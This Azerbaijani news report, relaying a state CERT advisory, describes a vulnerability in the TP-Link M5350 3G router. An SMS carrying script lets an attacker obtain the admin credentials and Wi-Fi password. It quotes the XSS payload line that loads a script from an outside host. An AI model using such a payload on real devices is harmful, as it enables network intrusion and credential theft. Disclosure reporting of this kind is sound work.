Cihazın SİM-kartına SMS göndərmək yolu ilə inzibatçı uçot qeydlərinin və Wi-Fi şifrəsini əldə etmək olar.
Xeberler.az bildirir ki, bu barədə Xüsusi Dövlət Mühafizə Xidməti, Xüsusi Rabitə və İnformasiya Təhlükəsizliyi Dövlət Agentliyinin Kompüter İnsidentlərinə qarşı Mübarizə Mərkəzi ( CERT) məlumat yayıb.
Qeyd edilib ki, Almaniya mütəxəssisi Yan Xerş Çin istehsalı TP-Link şirkətinin marşrutlayıcılarındakı mövcud boşluqlar onun SİM-kartına xüsusi şriftlə SMS-mesaj göndərmək yolu ilə cihazın şifrəsini əldə etməyə imkan verdiyini bildirib.
Problem 3G simsiz mobil - TP-Link M5350 marşrutlayıcıya aiddir. Belə ki, tədqiqatçı açıqlayıb ki, rabitə operatorları çox vaxt öz müştərilərinə marşrutlayıcıya SİM-kart yerləşdirilən bu modeli təklif edirlər.
SİM-kart marşrutlayıcıya operatorun şəbəkəsinə qoşulmağa imkan verir və istənilən digər SİM-kart kimi bunun da öz nömrəsi var.
Marşrutlayıcının proqram təminatının analizi zamanı Xerş SMS-mesajların daxil olduğu emal funksiyasında mövcud boşluqları aşkara çıxardıb.
O müəyyənləşdirib ki, şrift <script src=//n.ms/a.js >< /script > yolu ilə məlumatları göndərməklə inzibatçının uçot qeydlərinin şifrəsini, simsiz şəbəkə (SSID) identifikatorunu və Wi-Fi şəbəkəsinin şifrəsini əldə edə bilər.
Xeberler.az
Televiziyaların reytinqini kim ölçür, necə ölçür və nəticələr ağlabatan olacaqmı?
Nazirlik inkubasiya mərkəzlərini niyə topladı? –Şərh
Windows 10-u necə sürətləndirmək olar?
Bizi idarə edən güc: Netokratiya
Tor: şəbəkənin nəzarətindən azad olmaq imkanı
Facebook müəmması
4G mobil texnologiyası niyə ləngiyir?
Rəqəmli yayım: mərkəzdən kənarda yaşayanlar nə etsin?
“Asan imzanı belə gördüm”- Azər Həsrət
Azərbaycanda e-hökumətin inkişafinda yeni sosial tələbləri nəzərə alan xidmətlərin genişləndirilməsi perspektivləri